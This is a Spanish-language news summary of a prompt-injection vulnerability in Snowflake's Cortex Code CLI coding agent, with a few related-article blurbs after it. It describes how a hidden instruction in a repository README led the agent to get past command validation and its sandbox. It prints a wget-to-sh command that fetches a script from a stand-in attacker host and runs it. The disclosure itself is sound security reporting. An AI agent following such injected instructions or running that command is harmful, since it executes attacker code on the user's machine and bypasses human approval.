La vulnerabilidad de Snowflake Cortex Code CLI permitió la evasión del entorno de pruebas y la ejecución de malware

Detalles de la Vulnerabilidad
Snowflake Cortex Code CLI es un agente de codificación de línea de comandos que opera de manera similar a Claude Code y Codex de OpenAI, con integración incorporada para ejecutar SQL en Snowflake. Dos días después del lanzamiento, se identificó una vulnerabilidad en el sistema de validación de comandos de Cortex Code que permitía que comandos maliciosos especialmente construidos ejecutaran comandos arbitrarios sin activar los pasos de aprobación con intervención humana y ejecutar esos comandos fuera del entorno aislado de Cortex CLI.
Cadena de Ataque
El ataque funciona mediante inyección de comandos indirecta. Un usuario abre Cortex y activa el entorno aislado, luego le pide a Cortex ayuda con un código de fuente abierta de terceros. Una inyección de comandos oculta en el README de un repositorio no confiable manipula a Cortex para que crea que debe ejecutar un comando peligroso.
Cortex no logró validar comandos dentro de expresiones de sustitución de procesos, permitiendo la ejecución no aprobada del comando malicioso:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))Este comando descarga un script desde el servidor de un atacante y lo ejecuta. La omisión funcionó porque:
- Los comandos inseguros dentro de una expresión de sustitución de procesos <() no fueron evaluados por el sistema de validación
- El comando completo comenzaba con un comando 'seguro' (cat en este caso)
- Los comandos en expresiones de sustitución de procesos nunca activaban la aprobación humana
Omisión del Entorno Aislado
La inyección de comandos también manipula el modelo para establecer una bandera que activa la ejecución de comandos fuera del entorno aislado. Cortex, por defecto, puede establecer una bandera para activar la ejecución de comandos fuera del entorno aislado, y la inyección utiliza esto para permitir que el comando malicioso se ejecute fuera del entorno aislado.
Remediación
El equipo de seguridad de Snowflake validó y remedió esta vulnerabilidad, lanzando una corrección con Cortex Code CLI versión 1.0.25 el 28 de febrero de 2026. El aviso completo de Snowflake está disponible dentro del Sitio de la Comunidad de Snowflake en: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
Nota: Esta cadena de ataque también se aplicaba a usuarios sin entorno aislado. La documentación indica que en modo OS+Regular, todos los comandos solicitan aprobación del usuario. Los comandos ejecutados en el entorno aislado también tienen restricciones de acceso a red y archivos.
📖 Lea la fuente completa: HN AI Agents
👀 Ver también

OpenObscure: Cortafuegos de Privacidad de Código Abierto para Agentes de IA en Dispositivos
OpenObscure es un cortafuegos de privacidad de código abierto y en el dispositivo que se sitúa entre los agentes de IA y los proveedores de LLM. Utiliza el cifrado FF1 de preservación de formato con AES-256 para cifrar los valores de PII antes de que las solicitudes salgan de tu dispositivo, manteniendo la estructura de los datos mientras protege la privacidad.

Conceptos de seguridad para Vibe Coding con Claude Code: Autenticación, Autorización y Ejecución
Un ingeniero senior explica autenticación, autorización y enforcement para apps creadas con IA usando la metáfora de un hotel, más cómo pedir a agentes de IA que verifiquen la seguridad.

Análisis de Seguridad de la Extracción de Componentes de OpenClaw para Agentes de IA Personalizados
Un desarrollador analizó el código fuente de OpenClaw para determinar qué componentes pueden extraerse de manera segura para su uso en agentes de IA personalizados, evaluando cada uno mediante el marco Lethal Quartet. El análisis revela riesgos de seguridad significativos en componentes como Semantic Snapshots y BrowserClaw.

Usar Claude para auditar la configuración de OpenClaw revela problemas de seguridad.
Un desarrollador utilizó Claude para revisar su instalación de OpenClaw y descubrió que el bot estaba escribiendo claves API en texto claro en la memoria y archivos JSON, junto con otras preocupaciones de seguridad.